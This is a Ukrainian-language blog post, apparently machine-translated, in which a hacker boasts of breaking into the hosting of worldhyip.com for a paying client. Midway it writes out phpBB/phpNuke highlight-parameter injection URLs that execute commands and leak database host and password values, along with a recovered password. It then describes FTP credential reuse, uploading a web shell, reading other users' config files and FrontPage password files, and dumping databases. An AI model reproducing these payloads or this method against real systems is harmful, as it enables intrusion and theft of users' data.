Закінчувалося літо, закінчилися гроші.
Що б подолати фінансово-статевої криза довелося взяти халтурку додому.
Вступив тільки одне замовлення на злом форуму worldhyip.com.
Подивився на нього і взгруснул.
Апач свою версію не показує.
Ні зовнішньої ні внутрішньої інклуд.
Форум Powered by: vBulletin Version 3.0.3.
Патчений.
Засада.
Порти навіть скані не став, щоб не реєструватися.
Едінсвенний шлях який підказувало серце це пошукати інші бажние сайти у того ж хостера.
Скориставшись базою http://domainsdb.net/ встановив що тут же хоститься ще 300 з гаком сайтів.
Це вселяло надію.
Весь наступний день я переглядав список хостящіхся сайтів.
П'ята частина взагалі не функціонувала.
Дві третини становили убогі домашні сторінки тайванців, з рідкісним вкрапленням американців.
Знайшов пару шопів з візком Zen Cart, але мої минулі досліди не принесли мені успіху в її колупання.
Були і форуми phpBB від 2.0.3 до 2.0.11 і vBulletin Version від 3.0.0 до 3.0.6, але все патчений.
Була ще ось така замануха http://xxx.com/pages/pg.php3?ond=Zeep%20maken&cat='zeep але я залишив її наостанок.
Я вже думав забити клин на цю справу, але от мені попався сайт з phpNuke і форумом phpBB 2.0.10.
Перевіривши його на sql-ін'єкцію я побачив що він бажний.
Ось тільки була одна проблема, команди не виконувалися.
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.system($_GET[cmd]).%2527&cmd=ls
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ls
Ефект нуль, тільки кряказябра) \ b # i показує що форум непатченний.
Тоді спробував подивитися dbuser: dbpasswd:
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbuser.%2527
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbpasswd.%2527
теж саме.
День був не мій.
Зате запит:
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbhost.%2527
видав перший позитивну відповідь: 203.194.240.131
Тоді мені прийшла в голову думка що адмін напевно змінив значення $ dbpasswd і $ dbuser.
Тоді я ще не знав, що в версіях phpBB під phpNuke ці значення виглядають по іншому $ dbpass і $ dbname.
І точно, запит:
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbpass.%2527
повернув мені пароль: Anarar1 +
З $ dbuser цей номер не пройшов, я так і не зміг підібрати значення, копання в документації по phpBB я вирішив залишити до ранку.
Пішов спати.
Вранці прокинувся, і зрозумів що я осів.
Незнаю чому, але в Mozille форуми phpBB на phpNuke у мене завжди криво відображалися.
Логін був весь час у мене перед очима в повідомленні про помилку:
Warning: Can not modify header information - headers already sent by (output started at /home/login_xxx/www/www/header.php:32)
in /home/login_xxx/www/www/includes/page_header.php on line 492
Минулий досвід показував, що пара логін / пароль на phpBB іноді підходила і до фтп.
Удача.
Зайшов, залив веб-йшов.
І знову облом.
Прав на перегляд вмісту / home немає, uname не працює.
Заливати все підряд експлойти під Linux в надії отримати рута НЕ Форт.
Щось підказувало, що ядро свіже.
Дивлюся шлях до веб-сервера / home / login_xxx / www / www /, лізу в / etc / passwd і за аналогією намагається відкрити ls -pa / home / worldhyip / www / www
І знову доля повернулася до мене обличчям.
Бачу список файлів.
Видераю паролі до форуму cat /home/worldhyip/www/www/forum/includes/config.php
Коннекчусь до MySQL Дампле базу.
Бачу також паролі від Фронтпагі:
/_vti_pvt/service.pwd
і логін / пассвор ще до однієї MySQL-базі:
/config/config.php
Забираю паролі і дамп бази.
Базу відправляю замовнику, а грошики отримую і пропиваю.
Твій bug Durito.
_________________
EAT THE RICH!
|
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.